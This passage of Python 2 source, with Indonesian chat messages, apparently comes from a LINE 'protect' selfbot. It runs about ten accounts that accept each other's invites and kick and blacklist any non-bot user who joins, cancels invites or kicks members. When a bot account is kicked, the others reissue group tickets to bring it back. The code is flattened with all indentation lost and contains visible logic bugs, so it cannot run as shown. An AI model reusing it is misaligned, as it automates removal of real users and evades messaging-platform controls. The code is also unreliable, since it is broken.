if op.param2 in mid:
kk.acceptGroupInvitation(op.param1)
if op.param3 in Bmid:
if op.param2 in Amid:
kk.acceptGroupInvitation(op.param1)
if op.param3 in Bmid:
if op.param2 in Cmid:
kk.acceptGroupInvitation(op.param1)
if op.param3 in Bmid:
if op.param2 in Dmid:
kk.acceptGroupInvitation(op.param1)
if op.param3 in Bmid:
if op.param2 in Emid:
kk.acceptGroupInvitation(op.param1)
if op.param3 in Bmid:
if op.param2 in Fmid:
kk.acceptGroupInvitation(op.param1)
if op.param3 in Bmid:
if op.param2 in Gmid:
kk.acceptGroupInvitation(op.param1)
if op.param3 in Bmid:
if op.param2 in Hmid:
kk.acceptGroupInvitation(op.param1)
if op.param3 in Bmid:
if op.param2 in Imid:
kk.acceptGroupInvitation(op.param1)
#--------------------------------------------------------
if op.param3 in Cmid:
if op.param2 in mid:
kc.acceptGroupInvitation(op.param1)
if op.param3 in Cmid:
if op.param2 in Amid:
kc.acceptGroupInvitation(op.param1)
if op.param3 in Cmid:
if op.param2 in Bmid:
kc.acceptGroupInvitation(op.param1)
if op.param3 in Cmid:
if op.param2 in Dmid:
kc.acceptGroupInvitation(op.param1)
if op.param3 in Cmid:
if op.param2 in Emid:
kc.acceptGroupInvitation(op.param1)
if op.param3 in Cmid:
if op.param2 in Fmid:
kc.acceptGroupInvitation(op.param1)
if op.param3 in Cmid:
if op.param2 in Gmid:
kc.acceptGroupInvitation(op.param1)
if op.param3 in Cmid:
if op.param2 in Hmid:
kc.acceptGroupInvitation(op.param1)
if op.param3 in Cmid:
if op.param2 in Imid:
kc.acceptGroupInvitation(op.param1)
#--------------------------------------------------------
if op.param3 in Dmid:
if op.param2 in mid:
ks.acceptGroupInvitation(op.param1)
if op.param3 in Dmid:
if op.param2 in Amid:
ks.acceptGroupInvitation(op.param1)
if op.param3 in Dmid:
if op.param2 in Bmid:
ks.acceptGroupInvitation(op.param1)
if op.param3 in Dmid:
if op.param2 in Cmid:
ks.acceptGroupInvitation(op.param1)
if op.param3 in Dmid:
if op.param2 in Emid:
ks.acceptGroupInvitation(op.param1)
if op.param3 in Dmid:
if op.param2 in Fmid:
ks.acceptGroupInvitation(op.param1)
if op.param3 in Dmid:
if op.param2 in Gmid:
ks.acceptGroupInvitation(op.param1)
if op.param3 in Dmid:
if op.param2 in Hmid:
ks.acceptGroupInvitation(op.param1)
if op.param3 in Dmid:
if op.param2 in Imid:
ks.acceptGroupInvitation(op.param1)
#--------------------------------------------------------
if op.param3 in Emid:
if op.param2 in mid:
k1.acceptGroupInvitation(op.param1)
if op.param3 in Emid:
if op.param2 in Amid:
k1.acceptGroupInvitation(op.param1)
if op.param3 in Emid:
if op.param2 in Bmid:
k1.acceptGroupInvitation(op.param1)
if op.param3 in Emid:
if op.param2 in Cmid:
k1.acceptGroupInvitation(op.param1)
if op.param3 in Emid:
if op.param2 in Dmid:
k1.acceptGroupInvitation(op.param1)
if op.param3 in Emid:
if op.param2 in Fmid:
k1.acceptGroupInvitation(op.param1)
if op.param3 in Emid:
if op.param2 in Gmid:
k1.acceptGroupInvitation(op.param1)
if op.param3 in Emid:
if op.param2 in Hmid:
k1.acceptGroupInvitation(op.param1)
if op.param3 in Emid:
if op.param2 in Imid:
k1.acceptGroupInvitation(op.param1)
#--------------------------------------------------------
if op.param3 in Fmid:
if op.param2 in mid:
k2.acceptGroupInvitation(op.param1)
if op.param3 in Fmid:
if op.param2 in Amid:
k2.acceptGroupInvitation(op.param1)
if op.param3 in Fmid:
if op.param2 in Bmid:
k2.acceptGroupInvitation(op.param1)
if op.param3 in Fmid:
if op.param2 in Cmid:
k2.acceptGroupInvitation(op.param1)
if op.param3 in Fmid:
if op.param2 in Dmid:
k2.acceptGroupInvitation(op.param1)
if op.param3 in Fmid:
if op.param2 in Emid:
k2.acceptGroupInvitation(op.param1)
if op.param3 in Fmid:
if op.param2 in Gmid:
k2.acceptGroupInvitation(op.param1)
if op.param3 in Fmid:
if op.param2 in Hmid:
k2.acceptGroupInvitation(op.param1)
if op.param3 in Fmid:
if op.param2 in Imid:
k2.acceptGroupInvitation(op.param1)
#--------------------------------------------------------
if op.param3 in Gmid:
if op.param2 in mid:
k3.acceptGroupInvitation(op.param1)
if op.param3 in Gmid:
if op.param2 in Amid:
k3.acceptGroupInvitation(op.param1)
if op.param3 in Gmid:
if op.param2 in Bmid:
k3.acceptGroupInvitation(op.param1)
if op.param3 in Gmid:
if op.param2 in Cmid:
k3.acceptGroupInvitation(op.param1)
if op.param3 in Gmid:
if op.param2 in Dmid:
k3.acceptGroupInvitation(op.param1)
if op.param3 in Gmid:
if op.param2 in Emid:
k3.acceptGroupInvitation(op.param1)
if op.param3 in Gmid:
if op.param2 in Fmid:
k3.acceptGroupInvitation(op.param1)
if op.param3 in Gmid:
if op.param2 in Hmid:
k3.acceptGroupInvitation(op.param1)
if op.param3 in Gmid:
if op.param2 in Imid:
k3.acceptGroupInvitation(op.param1)
#--------------------------------------------------------
if op.param3 in Hmid:
if op.param2 in mid:
k4.acceptGroupInvitation(op.param1)
if op.param3 in Hmid:
if op.param2 in Amid:
k4.acceptGroupInvitation(op.param1)
if op.param3 in Hmid:
if op.param2 in Bmid:
k4.acceptGroupInvitation(op.param1)
if op.param3 in Hmid:
if op.param2 in Cmid:
k4.acceptGroupInvitation(op.param1)
if op.param3 in Hmid:
if op.param2 in Dmid:
k4.acceptGroupInvitation(op.param1)
if op.param3 in Hmid:
if op.param2 in Emid:
k4.acceptGroupInvitation(op.param1)
if op.param3 in Hmid:
if op.param2 in Fmid:
k4.acceptGroupInvitation(op.param1)
if op.param3 in Hmid:
if op.param2 in Gmid:
k4.acceptGroupInvitation(op.param1)
if op.param3 in Hmid:
if op.param2 in Imid:
k4.acceptGroupInvitation(op.param1)
#--------------------------------------------------------
if op.param3 in Imid:
if op.param2 in mid:
k5.acceptGroupInvitation(op.param1)
if op.param3 in Imid:
if op.param2 in Amid:
k5.acceptGroupInvitation(op.param1)
if op.param3 in Imid:
if op.param2 in Bmid:
k5.acceptGroupInvitation(op.param1)
if op.param3 in Imid:
if op.param2 in Cmid:
k5.acceptGroupInvitation(op.param1)
if op.param3 in Imid:
if op.param2 in Dmid:
k5.acceptGroupInvitation(op.param1)
if op.param3 in Imid:
if op.param2 in Emid:
k5.acceptGroupInvitation(op.param1)
if op.param3 in Imid:
if op.param2 in Fmid:
k5.acceptGroupInvitation(op.param1)
if op.param3 in Imid:
if op.param2 in Gmid:
k5.acceptGroupInvitation(op.param1)
if op.param3 in Imid:
if op.param2 in Hmid:
k5.acceptGroupInvitation(op.param1)
#--------------------------------------------------------
#--------------------------------------------------------
if op.type == 13:
if mid in op.param3:
if wait["autoJoin"] == True:
if op.param2 in Bots or owner:
cl.acceptGroupInvitation(op.param1)
else:
cl.rejectGroupInvitation(op.param1)
else:
print "autoJoin is Off"
if Amid in op.param3:
if wait["autoJoin"] == True:
if op.param2 in Bots or owner:
ki.acceptGroupInvitation(op.param1)
else:
ki.rejectGroupInvitation(op.param1)
else:
print "autoJoin is Off"
if Bmid in op.param3:
if wait["autoJoin"] == True:
if op.param2 in Bots or owner:
kk.acceptGroupInvitation(op.param1)
else:
kk.rejectGroupInvitation(op.param1)
else:
print "autoJoin is Off"
if Cmid in op.param3:
if wait["autoJoin"] == True:
if op.param2 in Bots or owner:
kc.acceptGroupInvitation(op.param1)
else:
kc.rejectGroupInvitation(op.param1)
else:
print "autoJoin is Off"
if Dmid in op.param3:
if wait["autoJoin"] == True:
if op.param2 in Bots or owner:
ks.acceptGroupInvitation(op.param1)
else:
ks.rejectGroupInvitation(op.param1)
else:
print "autoJoin is Off"
if Emid in op.param3:
if wait["autoJoin"] == True:
if op.param2 in Bots or owner:
k1.acceptGroupInvitation(op.param1)
else:
k1.rejectGroupInvitation(op.param1)
else:
print "autoJoin is Off"
if Fmid in op.param3:
if wait["autoJoin"] == True:
if op.param2 in Bots or owner:
k2.acceptGroupInvitation(op.param1)
else:
k2.rejectGroupInvitation(op.param1)
else:
print "autoJoin is Off"
if Gmid in op.param3:
if wait["autoJoin"] == True:
if op.param2 in Bots or owner:
k3.acceptGroupInvitation(op.param1)
else:
k3.rejectGroupInvitation(op.param1)
else:
print "autoJoin is Off"
if Hmid in op.param3:
if wait["autoJoin"] == True:
if op.param2 in Bots or owner:
k4.acceptGroupInvitation(op.param1)
else:
k4.rejectGroupInvitation(op.param1)
else:
print "autoJoin is Off"
if Imid in op.param3:
if wait["autoJoin"] == True:
if op.param2 in Bots or owner:
k5.acceptGroupInvitation(op.param1)
else:
k5.rejectGroupInvitation(op.param1)
else:
print "autoJoin is Off"
#--------------------------------------------------------
if op.type == 17:
if wait["Protectjoin"] == True:
if op.param2 not in Bots:
if op.param2 in Bots:
pass
elif op.param2 in admin:
pass
elif op.param2 in owner:
pass
else:
try:
random.choice(KAC).kickoutFromGroup(op.param1,[op.param2])
cl.sendText(op.param1, "Protect Join nya On Boss\nMatiin dulu kalo mau Ada yang Gabung\nJoinn on/off")
except:
random.choice(KAC).kickoutFromGroup(op.param1,[op.param2])
cl.sendText(op.param1, "Protect Join nya On Boss\nMatiin dulu kalo mau Ada yang Gabung\nJoinn on/off")
#------Joined User Kick start------#
if op.type == 32: #Yang Cancel Invitan langsung ke kick
if wait["Protectcancel"] == True:
if op.param2 not in Bots:
if op.param2 in Bots:
pass
elif op.param2 in admin:
pass
elif op.param2 in owner:
pass
else:
random.choice(KAC).sendText(op.param1, "Jangan di cancel woy...!!!\nAdmin Bukan,Owner Juga Bukan\Kick Ah 😛")
random.choice(KAC).kickoutFromGroup(op.param1,[op.param2])
#------------------NOTIFIED_KICKOUT_FROM_GROUP-----------------
if op.type == 19:
if wait["AutoKick"] == True:
try:
if op.param3 in Bots:
pass
if op.param2 in Bots:
pass
else:
random.choice(KAC).kickoutFromGroup(op.param1,[op.param2])
if op.param2 in wait["blacklist"]:
pass
else:
kk.inviteIntoGroup(op.param1,[op.param3])
except:
try:
if op.param2 not in Bots:
random.choice(KAC).kickoutFromGroup(op.param1,[op.param2])
if op.param2 in wait["blacklist"]:
pass
else:
random.choice(KAC).inviteIntoGroup(op.param1,[op.param3])
except:
print ("client Kick regulation or Because it does not exist in the group\ngid=["+op.param1+"]\nmid=["+op.param2+"]")
if op.param2 in wait["blacklist"]:
pass
else:
if op.param2 in Bots:
pass
else:
wait["blacklist"][op.param2] = True
if op.param2 in wait["blacklist"]:
pass
else:
if op.param2 in Bots:
pass
else:
wait["blacklist"][op.param2] = True
else:
pass
#-----------------------------------------------------------------
if mid in op.param3:
if op.param2 in Bots:
pass
try:
ki.kickoutFromGroup(op.param1,[op.param2])
kk.kickoutFromGroup(op.param1,[op.param2])
except:
try:
random.choice(KAC).kickoutFromGroup(op.param1,[op.param2])
except:
print ("client Kick regulation or Because it does not exist in the group\ngid=["+op.param1+"]\nmid=["+op.param2+"]")
if op.param2 in wait["blacklist"]:
pass
else:
if op.param2 in Bots:
pass
else:
wait["blacklist"][op.param2] = True
G = ki.getGroup(op.param1)
G.preventJoinByTicket = False
ki.updateGroup(G)
Ti = ki.reissueGroupTicket(op.param1)
cl.acceptGroupInvitationByTicket(op.param1,Ti)
X = cl.getGroup(op.param1)
X.preventJoinByTicket = True
cl.updateGroup(X)
if op.param2 in wait["blacklist"]:
pass
else:
if op.param2 in Bots:
pass
else:
wait["blacklist"][op.param2] = True
if Amid in op.param3:
if op.param2 in Bots:
pass
try:
kk.kickoutFromGroup(op.param1,[op.param2])
kc.kickoutFromGroup(op.param1,[op.param2])
except:
try:
random.choice(KAC).kickoutFromGroup(op.param1,[op.param2])
except:
print ("client Kick regulation or Because it does not exist in the group\ngid=["+op.param1+"]\nmid=["+op.param2+"]")
if op.param2 in wait["blacklist"]:
pass
else:
if op.param2 in Bots:
pass
else:
wait["blacklist"][op.param2] = True
X = kk.getGroup(op.param1)
X.preventJoinByTicket = False
kk.updateGroup(X)
Ti = kk.reissueGroupTicket(op.param1)
ki.acceptGroupInvitationByTicket(op.param1,Ti)
G = ki.getGroup(op.param1)
G.preventJoinByTicket = True
ki.updateGroup(G)
if op.param2 in wait["blacklist"]:
pass
else:
if op.param2 in Bots:
pass
else:
wait["blacklist"][op.param2] = True
if Bmid in op.param3:
if op.param2 in Bots:
pass
try:
kc.kickoutFromGroup(op.param1,[op.param2])
ks.kickoutFromGroup(op.param1,[op.param2])
except:
try:
random.choice(KAC).kickoutFromGroup(op.param1,[op.param2])
except:
print ("client Kick regulation or Because it does not exist in the group\ngid=["+op.param1+"]\nmid=["+op.param2+"]")
if op.param2 in wait["blacklist"]:
pass
else:
if op.param2 in Bots:
pass
else:
wait["blacklist"][op.param2] = True
X = kc.getGroup(op.param1)
X.preventJoinByTicket = False
kc.updateGroup(X)
Ti = kc.reissueGroupTicket(op.param1)
kk.acceptGroupInvitationByTicket(op.param1,Ti)
G = kk.getGroup(op.param1)
G.preventJoinByTicket = True
kk.updateGroup(G)
if op.param2 in wait["blacklist"]:
pass
else:
if op.param2 in Bots:
pass
else:
wait["blacklist"][op.param2] = True
if Cmid in op.param3:
if op.param2 in Bots:
pass
try:
ks.kickoutFromGroup(op.param1,[op.param2])
k1.kickoutFromGroup(op.param1,[op.param2])
except:
try:
random.choice(KAC).kickoutFromGroup(op.param1,[op.param2])
except:
print ("client Kick regulation or Because it does not exist in the group\ngid=["+op.param1+"]\nmid=["+op.param2+"]")
if op.param2 in wait["blacklist"]:
pass
else:
if op.param2 in Bots:
pass
else:
wait["blacklist"][op.param2] = True
G = ks.getGroup(op.param1)
G.preventJoinByTicket = False
ks.updateGroup(G)
Ti = ks.reissueGroupTicket(op.param1)
kc.acceptGroupInvitationByTicket(op.param1,Ti)
X = kc.getGroup(op.param1)
X.preventJoinByTicket = True
kc.updateGroup(X)
if op.param2 in wait["blacklist"]:
pass
else:
if op.param2 in Bots:
pass
else:
wait["blacklist"][op.param2] = True
if Dmid in op.param3:
if op.param2 in Bots:
pass
try:
k1.kickoutFromGroup(op.param1,[op.param2])
k2.kickoutFromGroup(op.param1,[op.param2])
except:
try:
random.choice(KAC).kickoutFromGroup(op.param1,[op.param2])
except:
print ("client Kick regulation or Because it does not exist in the group\ngid=["+op.param1+"]\nmid=["+op.param2+"]")
if op.param2 in wait["blacklist"]:
pass
else:
if op.param2 in Bots:
pass
else:
wait["blacklist"][op.param2] = True
G = k1.getGroup(op.param1)
G.preventJoinByTicket = False
k1.updateGroup(G)
Ti = k1.reissueGroupTicket(op.param1)
ks.acceptGroupInvitationByTicket(op.param1,Ti)
X = ks.getGroup(op.param1)
X.preventJoinByTicket = True
ks.updateGroup(X)
if op.param2 in wait["blacklist"]:
pass
else:
if op.param2 in Bots:
pass
else:
wait["blacklist"][op.param2] = True
if Emid in op.param3:
if op.param2 in Bots:
pass
try:
k2.kickoutFromGroup(op.param1,[op.param2])
k3.kickoutFromGroup(op.param1,[op.param2])
except:
try:
random.choice(KAC).kickoutFromGroup(op.param1,[op.param2])
except:
print ("client Kick regulation or Because it does not exist in the group\ngid=["+op.param1+"]\nmid=["+op.param2+"]")
if op.param2 in wait["blacklist"]:
pass
else:
if op.param2 in Bots:
pass
else:
wait["blacklist"][op.param2] = True
G = k2.getGroup(op.param1)
G.preventJoinByTicket = False
k2.updateGroup(G)
Ti = k2.reissueGroupTicket(op.param1)
k1.acceptGroupInvitationByTicket(op.param1,Ti)
X = k1.getGroup(op.param1)
X.preventJoinByTicket = True
k1.updateGroup(X)
if op.param2 in wait["blacklist"]:
pass
else:
if op.param2 in Bots:
pass
else:
wait["blacklist"][op.param2] = True
if Fmid in op.param3:
if op.param2 in Bots:
pass
try:
k3.kickoutFromGroup(op.param1,[op.param2])
k4.kickoutFromGroup(op.param1,[op.param2])
except:
try:
random.choice(KAC).kickoutFromGroup(op.param1,[op.param2])
except:
print ("client Kick regulation or Because it does not exist in the group\ngid=["+op.param1+"]\nmid=["+op.param2+"]")
if op.param2 in wait["blacklist"]:
pass
else:
if op.param2 in Bots:
pass
else:
wait["blacklist"][op.param2] = True
G = k3.getGroup(op.param1)
G.preventJoinByTicket = False
k3.updateGroup(G)
Ti = k3.reissueGroupTicket(op.param1)
k2.acceptGroupInvitationByTicket(op.param1,Ti)
X = k2.getGroup(op.param1)
X.preventJoinByTicket = True
k2.updateGroup(X)
if op.param2 in wait["blacklist"]:
pass
else:
if op.param2 in Bots:
pass
else:
wait["blacklist"][op.param2] = True
if Gmid in op.param3:
if op.param2 in Bots:
pass
try:
k4.kickoutFromGroup(op.param1,[op.param2])
k5.kickoutFromGroup(op.param1,[op.param2])
except:
try:
random.choice(KAC).kickoutFromGroup(op.param1,[op.param2])
except:
print ("client Kick regulation or Because it does not exist in the group\ngid=["+op.param1+"]\nmid=["+op.param2+"]")
if op.param2 in wait["blacklist"]:
pass
else:
if op.param2 in Bots:
pass
else:
wait["blacklist"][op.param2] = True
G = k4.getGroup(op.param1)
G.preventJoinByTicket = False
k4.updateGroup(G)
Ti = k4.reissueGroupTicket(op.param1)
k3.acceptGroupInvitationByTicket(op.param1,Ti)
X = k3.getGroup(op.param1)
X.preventJoinByTicket = True
k3.updateGroup(X)
if op.param2 in wait["blacklist"]:
pass
else:
if op.param2 in Bots:
pass
else:
wait["blacklist"][op.param2] = True
if Hmid in op.param3:
if op.param2 in Bots:
pass
try:
k5.kickoutFromGroup(op.param1,[op.param2])
cl.kickoutFromGroup(op.param1,[op.param2])
except:
try:
random.choice(KAC).kickoutFromGroup(op.param1,[op.param2])
except:
print ("client Kick regulation or Because it does not exist in the group\ngid=["+op.param1+"]\nmid=["+op.param2+"]")
if op.param2 in wait["blacklist"]:
pass
else:
if op.param2 in Bots:
pass
else:
wait["blacklist"][op.param2] = True
G = k5.getGroup(op.param1)
G.preventJoinByTicket = False
k5.updateGroup(G)
Ti = k5.reissueGroupTicket(op.param1)
k4.acceptGroupInvitationByTicket(op.param1,Ti)
X = k4.getGroup(op.param1)
X.preventJoinByTicket = True
k4.updateGroup(X)
if op.param2 in wait["blacklist"]:
pass
else:
if op.param2 in Bots:
pass
else:
wait["blacklist"][op.param2] = True
if Imid in op.param3:
if op.param2 in Bots:
pass
try:
cl.kickoutFromGroup(op.param1,[op.param2])
ki.kickoutFromGroup(op.param1,[op.param2])
except:
try:
random.choice(KAC).kickoutFromGroup(op.param1,[op.param2])
except:
print ("client Kick regulation or Because it does not exist in the group\ngid=["+op.param1+"]\nmid=["+op.param2+"]")
if op.param2 in wait["blacklist"]:
pass
else:
if op.param2 in Bots:
pass
else:
wait["blacklist"][op.param2] = True
G = cl.getGroup(op.param1)
G.preventJoinByTicket = False
cl.updateGroup(G)
Ti = cl.reissueGroupTicket(op.param1)
k5.acceptGroupInvitationByTicket(op.param1,Ti)
X = k5.getGroup(op.param1)
X.preventJoinByTicket = True
k5.updateGroup(X)
if op.param2 in wait["blacklist"]:
pass
else:
if op.param2 in Bots:
pass
else:
wait["blacklist"][op.param2] = True
#--------------------------------------------------------
if op.type == 19:
if op.param3 in admin or owner:
if op.param2 not in Bots:
try:
cl.kickoutFromGroup(op.param1,[op.param2])
cl.inviteIntoGroup(op.param1,[op.param3])
wait["blacklist"][op.param2] = True
except:
random.choice(KAC).kickoutFromGroup(op.param1,[op.param2])
random.choice(KAC).inviteIntoGroup(op.param1,[op.param3])
wait["blacklist"][op.param2] = True
if op.type == 19:
if op.param3 in admin or owner:
if op.param2 in Bots:
try:
cl.inviteIntoGroup(op.param1,[op.param3])
except:
random.choice(KAC).inviteIntoGroup(op.param1,[op.param3])
if op.type == 19:
if op.param3 in admin or owner:
if op.param2 not in Bots:
try:
k1.kickoutFromGroup(op.param1,[op.param2])
k1.inviteIntoGroup(op.param1,[op.param3])
wait["blacklist"][op.param2] = True
except:
random.choice(KAC).kickoutFromGroup(op.param1,[op.param2])
random.choice(KAC).inviteIntoGroup(op.param1,[op.param3])
wait["blacklist"][op.param2] = True
if op.param3 in induk:
if op.param2 not in Bots:
try:
random.choice(DEF).kickoutFromGroup(op.param1,[op.param2])
random.choice(DEF).inviteIntoGroup(op.param1,[op.param3])
wait["blacklist"][op.param2] = True
cl.acceptGroupInvitationt(op.param1)
except:
random.choice(KAC).kickoutFromGroup(op.param1,[op.param2])
random.choice(KAC).inviteIntoGroup(op.param1,[op.param3])
wait["blacklist"][op.param2] = True
# if op.type == 19:
# if op.param2 not in Bots:
# if op.param3 in mid:
# if op.param2 not in Bots:
# try:
# random.choice(DEF).kickoutFromGroup(op.param1,[op.param2])
# G = random.choice(DEF).getGroup(op.param1)
# G.preventJoinByTicket = False
# random.choice(DEF).updateGroup(G)
# Ticket = random.choice(DEF).reissueGroupTicket(op.param1)
# cl.acceptGroupInvitationByTicket(op.param1,Ticket)
# time.sleep(0.001)
# G = random.choice(DEF).getGroup(op.param1)
# G.preventJoinByTicket = True
# random.choice(DEF).updateGroup(G)
# wait["blacklist"][op.param2] = True
# except:
# random.choice(KAC).kickoutFromGroup(op.param1,[op.param2])
# G = random.choice(KAC).getGroup(op.param1)
# G.preventJoinByTicket = False
# random.choice(KAC).updateGroup(G)
# Ticket = random.choice(KAC).reissueGroupTicket(op.param1)
# cl.acceptGroupInvitationByTicket(op.param1,Ticket)
# time.sleep(0.001)
# G = random.choice(KAC).getGroup(op.param1)
# G.preventJoinByTicket = True
# random.choice(KAC).updateGroup(G)
# wait["blacklist"][op.param2] = True
#
#-----------------------------------------------
# if op.type == 19:
# if op.param2 not in Bots:
# if op.param3 in Bots:
# if op.param2 not in Bots:
# try:
# cl.kickoutFromGroup(op.param1,[op.param2])
# G = cl.getGroup(op.param1)
# G.preventJoinByTicket = False
# cl.updateGroup(G)
# Ticket = cl.reissueGroupTicket(op.param1)
# ki.acceptGroupInvitationByTicket(op.param1,Ticket)
# time.sleep(0.001)
# kk.acceptGroupInvitationByTicket(op.param1,Ticket)
# time.sleep(0.001)
# kc.acceptGroupInvitationByTicket(op.param1,Ticket)
# time.sleep(0.001)
# ks.acceptGroupInvitationByTicket(op.param1,Ticket)
# time.sleep(0.001)
# k1.acceptGroupInvitationByTicket(op.param1,Ticket)
# time.sleep(0.001)
# k2.acceptGroupInvitationByTicket(op.param1,Ticket)
# time.sleep(0.001)
# k3.acceptGroupInvitationByTicket(op.param1,Ticket)
# time.sleep(0.001)
# k4.acceptGroupInvitationByTicket(op.param1,Ticket)
# time.sleep(0.001)
# k5.acceptGroupInvitationByTicket(op.param1,Ticket)
# time.sleep(0.001)
# G = cl.getGroup(op.param1)
# G.preventJoinByTicket = True
# cl.updateGroup(G)
# wait["blacklist"][op.param2] = True
# except:
# random.choice(KAC).kickoutFromGroup(op.param1,[op.param2])
# G = random.choice(KAC).getGroup(op.param1)
# G.preventJoinByTicket = False
# random.choice(KAC).updateGroup(G)
# Ticket = random.choice(KAC).reissueGroupTicket(op.param1)
# cl.acceptGroupInvitationByTicket(op.param1,Ticket)
# time.sleep(0.001)
# ki.acceptGroupInvitationByTicket(op.param1,Ticket)
# time.sleep(0.001)
# kk.acceptGroupInvitationByTicket(op.param1,Ticket)
# time.sleep(0.001)
# kc.acceptGroupInvitationByTicket(op.param1,Ticket)
# time.sleep(0.001)
# ks.acceptGroupInvitationByTicket(op.param1,Ticket)
# time.sleep(0.001)
# k1.acceptGroupInvitationByTicket(op.param1,Ticket)
# time.sleep(0.001)
# k2.acceptGroupInvitationByTicket(op.param1,Ticket)
# time.sleep(0.001)
# k3.acceptGroupInvitationByTicket(op.param1,Ticket)
# time.sleep(0.001)
# k4.acceptGroupInvitationByTicket(op.param1,Ticket)
# time.sleep(0.001)
# k5.acceptGroupInvitationByTicket(op.param1,Ticket)
# time.sleep(0.001)
# G = random.choice(KAC).getGroup(op.param1)
# G.preventJoinByTicket = True
# random.choice(KAC).updateGroup(G)
# wait["blacklist"][op.param2] = True
#--------------------------------
if op.type == 22:
if wait["leaveRoom"] == True:
cl.leaveRoom(op.param1)
if op.type == 24:
if wait["leaveRoom"] == True:
cl.leaveRoom(op.param1)
if op.type == 26:
msg = op.message
if msg.toType == 1:
if wait["leaveRoom"] == True:
cl.leaveRoom(msg.to)
if msg.contentType == 16:
url = msg.contentMetadata("line://home/post?userMid="+mid+"&postId="+"new_post")
cl.like(url[25:58], url[66:], likeType=1001)
#===========================================
if op.type == 17:
if op.param2 in Bots:
return
ginfo = cl.getGroup(op.param1)
random.choice(KAC).sendText(op.param1, "╔═════════════\n║Selamat Datang Di " + str(ginfo.name) + "\n╠═════════════\n" + "║Founder =>>> " + str(ginfo.name) + " :\n║" + ginfo.creator.displayName + "\n╠═════════════\n" + "║😊Semoga Betah Kak 😘 \n╠═════════════\n║No Baper,No nakal,No Ngeyel ya..!! \n╚═════════════")
print "MEMBER HAS JOIN THE GROUP"
if op.type == 15:
if op.param2 in Bots:
return
random.choice(KAC).sendText(op.param1, "╔═════════════\n║Baper Tuh Orang :v \n╠═════════════\n║Belum di Anu Kayanya 😊 \n╚═════════════")
print "MEMBER HAS LEFT THE GROUP"
#--------------------------------------------------------
if op.type == 26:
msg = op.message
if msg.contentType == 13:
if wait["winvite"] == True:
if msg.from_ in admin:
_name = msg.contentMetadata["displayName"]
invite = msg.contentMetadata["mid"]
groups = cl.getGroup(msg.to)
pending = groups.invitee
targets = []
for s in groups.members:
if _name in s.displayName:
cl.sendText(msg.to,"-> " + _name + " was here")
break
elif invite in wait["blacklist"]:
ki.sendText(msg.to,"Sorry, " + _name + " On Blacklist")
ki.sendText(msg.to,"Call my owner to use command !, \n➡Unban: " + invite)
break
else:
targets.append(invite)
if targets == []:
pass
else:
for target in targets:
try:
cl.findAndAddContactsByMid(target)
cl.inviteIntoGroup(msg.to,[target])
cl.sendText(msg.to,"Done Invite : \n➡" + _name)
wait["winvite"] = False
break
except:
try:
ki.findAndAddContactsByMid(invite)
ki.inviteIntoGroup(op.param1,[invite])
wait["winvite"] = False
except:
cl.sendText(msg.to,"Negative, Error detected")
wait["winvite"] = False
break
if op.type == 26:
msg = op.message
if msg.contentType == 13:
if wait["winvite2"] == True:
if msg.from_ in admin:
_name = msg.contentMetadata["displayName"]
invite = msg.contentMetadata["mid"]
groups = random.choice(KAC).getGroup(msg.to)
pending = groups.invitee
targets = []
for s in groups.members:
if _name in s.displayName:
random.choice(KAC).sendText(msg.to,"-> " + _name + " was here")
break
elif invite in wait["blacklist"]:
random.choice(KAC).sendText(msg.to,"Sorry, " + _name + " On Blacklist")
random.choice(KAC).sendText(msg.to,"Call my owner to use command !, \n➡Unban: " + invite)
break
else:
targets.append(invite)
if targets == []:
pass
else:
for target in targets:
try:
random.choice(KAC).findAndAddContactsByMid(target)
random.choice(KAC).inviteIntoGroup(msg.to,[target])
random.choice(KAC).sendText(msg.to,"Selesai di Invite : \n➡" + _name)
wait["winvite2"] = False
break
except:
try:
random.choice(KAC).findAndAddContactsByMid(invite)
random.choice(KAC).inviteIntoGroup(op.param1,[invite])
wait["winvite2"] = False
except:
random.choice(KAC).sendText(msg.to,"Error Boss, di tunggu beberapa saat lagi boss")
wait["winvite2"] = False
break
if op.type == 26:
msg = op.message
if msg.contentType == 13:
if op.param2 in admin or Bots:
pass
else:
if wait["wblack"] == True:
if msg.contentMetadata["mid"] in wait["commentBlack"]:
cl.sendText(msg.to,"already")
wait["wblack"] = False
else:
wait["commentBlack"][msg.contentMetadata["mid"]] = True
wait["wblack"] = False
cl.sendText(msg.to,"decided not to comment")
elif wait["dblack"] == True:
if msg.contentMetadata["mid"] in wait["commentBlack"]:
del wait["commentBlack"][msg.contentMetadata["mid"]]
cl.sendText(msg.to,"deleted")
ki.sendText(msg.to,"deleted")
kk.sendText(msg.to,"deleted")
kc.sendText(msg.to,"deleted")
ks.sendText(msg.to,"deleted")
wait["dblack"] = False
else:
wait["dblack"] = False
cl.sendText(msg.to,"It is not in the black list")
ki.sendText(msg.to,"It is not in the black list")
kk.sendText(msg.to,"It is not in the black list")
kc.sendText(msg.to,"It is not in the black list")
ks.sendText(msg.to,"It is not in the black list")
elif wait["wblacklist"] == True:
if msg.contentMetadata["mid"] in wait["blacklist"]:
cl.sendText(msg.to,"already")
ki.sendText(msg.to,"already")
kk.sendText(msg.to,"already")
kc.sendText(msg.to,"already")
ks.sendText(msg.to,"already")
wait["wblacklist"] = False
else:
wait["blacklist"][msg.contentMetadata["mid"]] = True
wait["wblacklist"] = False
cl.sendText(msg.to,"aded")
ki.sendText(msg.to,"aded")
kk.sendText(msg.to,"aded")
kc.sendText(msg.to,"aded")
ks.sendText(msg.to,"aded")
elif wait["dblacklist"] == True:
if msg.contentMetadata["mid"] in wait["blacklist"]:
del wait["blacklist"][msg.contentMetadata["mid"]]
cl.sendText(msg.to,"deleted")
ki.sendText(msg.to,"deleted")
kk.sendText(msg.to,"deleted")
kc.sendText(msg.to,"deleted")
ks.sendText(msg.to,"deleted")
wait["dblacklist"] = False
else:
wait["dblacklist"] = False
cl.sendText(msg.to,"It is not in the black list")
ki.sendText(msg.to,"It is not in the black list")
kk.sendText(msg.to,"It is not in the black list")
kc.sendText(msg.to,"It is not in the black list")
ks.sendText(msg.to,"It is not in the black list")
elif wait["contact"] == True:
msg.contentType = 0
cl.sendText(msg.to,msg.contentMetadata["mid"])
if 'displayName' in msg.contentMetadata:
contact = cl.getContact(msg.contentMetadata["mid"])
try:
cu = cl.channel.getCover(msg.contentMetadata["mid"])
except:
cu = ""
cl.sendText(msg.to,"[displayName]:\n" + msg.contentMetadata["displayName"] + "\n[mid]:\n" + msg.contentMetadata["mid"] + "\n[statusMessage]:\n" + contact.statusMessage + "\n[pictureStatus]:\nhttp://dl.profile.line-cdn.net/" + contact.pictureStatus + "\n[coverURL]:\n" + str(cu))
else:
contact = cl.getContact(msg.contentMetadata["mid"])
try:
